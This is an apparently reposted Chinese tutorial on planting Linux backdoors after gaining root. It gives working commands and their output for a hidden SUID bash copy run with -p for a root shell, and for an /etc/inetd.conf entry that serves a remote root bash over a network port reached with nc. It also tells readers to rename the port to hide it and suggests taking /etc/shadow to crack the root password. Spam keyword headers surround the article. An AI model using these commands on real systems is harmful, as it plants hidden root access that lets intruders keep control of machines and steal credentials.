成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Linux后門的兩種姿勢:suid shell與inetd后門

作者:月巴_又鳥
安全 黑客攻防 網站安全
本文主要講解了Linux后門的兩種姿勢:suid shell與inetd后門。

前提:

你現在已經是root用戶, 想留一個后門。

Linux后門的兩種姿勢:suid shell與inetd后門

系統環境:

dawg:~# uname -a 
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

1. SUID shell

首先, 先切換成為root用戶,并執行以下的命令:

dawg:~# cp /bin/bash /.woot
dawg:~# chmod 4755 /.woot
dawg:~# ls -al /.woot
-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot

當然, 你也可以起其他更具備隱藏性的名字,我想猥瑣并機智的你,肯定能想出很多好的名字的。文件前面的那一點也不是必要的,只是為了隱藏文件( 在文件名的最前面加上“.”,就可以在任意文件目錄下進行隱藏) .

現在,做為一個普通用戶,我們來啟用這個后門:

fw@dawg:~$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
fw@dawg:~$ /.woot
.woot-2.05b$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
.woot-2.05b$

為什么不行呢?

因為 bash2 針對 suid有一些護衛的措施. 但這也不是不可破的:

.woot-2.05b$ /.woot -p 
.woot-2.05b# id 
uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw)

使用-p參數來獲取一個root shell. 這個euid的意思是 effective user id(關于這些ID的知識,可以戳這里)

這里要特別注意的是,作為一個普通用戶執行這個SUID shell時,一定要使用全路徑。

小知識:

如何查找那些具有SUID 的文件:

dawg:~# find / -perm +4000 -ls

這時就會返回具有SUID位的文件啦。

2. 遠程后門:利用 /etc/inetd.conf

我們使用vi來修改 /etc/inetd.conf 文件

原文件:

#chargen dgram udp wait root internal 
#discard stream tcp nowait root internal 
#discard dgram udp wait root internal 
#daytime stream tcp nowait root internal

修改為:

#discard stream tcp nowait root internal 
#discard dgram udp wait root internal 
daytime stream tcp nowait root /bin/bash bash -i

開啟inetd:

dawg:~# inetd

如果要強制重啟inetd:

dawg:~# ps -ef | grep inetd
root 362 1 0 Jul22 ? 00:00:00 /usr/sbin/inetd
root 13769 13643 0 17:51 pts/1 00:00:00 grep inetd
dawg:~# kill -HUP 362

現在我們就可以用nc來爆菊了:

C:tools 
192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.77] 13 (daytime) open
bash: no job control in this shell
bash-2.05b# bash-2.05b#
bash-2.05b# id
uid=0(root) gid=0(root) groups=0(root)
bash-2.05b# uname -a
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

小貼士:

我們可以修改/etc/services文件,加入以下的東西:

woot 6666/tcp #evil backdoor service

然后修改/etc/inetd.conf :

woot stream tcp nowait root /bin/bash bash -i

我們可以修改成一些常見的端口,以實現隱藏。

小編感言: 其實下 /etc/shadow文件,爆破root的密碼才最保險啊!

責任編輯:藍雨淚 來源: 網絡安全攻防實驗室
Linux后門SUIDshell后門
相關推薦

2010-08-02 14:36:52

ICMPLinux

2010-09-13 14:47:58

2010-09-13 15:06:36

2010-09-13 14:57:29

2010-03-10 10:24:16

Linux ssh后門

2010-09-13 14:34:55

2010-09-13 15:14:03

2013-07-09 16:12:47

2016-02-25 11:02:11

2020-06-18 08:18:35

密碼加密安全

2010-09-13 15:26:34

2014-05-23 09:56:27

2011-11-25 15:34:33

2023-01-06 08:42:02

學習訓練

2018-01-11 09:51:34

2010-01-15 10:32:40

2024-04-03 14:28:12

2010-01-14 20:57:59

2013-06-19 10:03:42

2013-08-20 16:16:19

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久久美女网| 欧美一区二区三区在线观看 | av电影手机版| 国产一区二区三区四区五区3d | 欧美日韩中文字幕在线 | 精品二区| 国产亚洲成av人在线观看导航 | 久久久久成人精品免费播放动漫 | 日本一区精品 | 在线欧美日韩 | 久久精品国产亚洲 | 日韩欧美在线播放 | 夜夜骑天天干 | 天天干夜夜拍 | 天天躁日日躁性色aⅴ电影 免费在线观看成年人视频 国产欧美精品 | 久久久91| 99久久久久久久 | 欧美精品一区二区在线观看 | 久久久久一区二区三区 | 国产精品高潮呻吟 | 东京av男人的天堂 | 久草青青 | 欧美一区视频 | 国产精品视频免费观看 | 久草热视频 | 天天干狠狠操 | 岛国二区 | 国产精品日女人 | 国产成人免费视频网站视频社区 | 91精品国产一区二区 | 国产成人精品一区二区三区在线观看 | 精品一区二区电影 | 精品欧美一区二区三区久久久 | 美女黄视频网站 | 久久综合久色欧美综合狠狠 | 日韩国产黄色片 | 国产乱码精品一区二区三区五月婷 | 国产亚洲精品久久情网 | 日本黄色高清视频 | 国产精品久久久久久久久免费软件 | 最新国产精品 |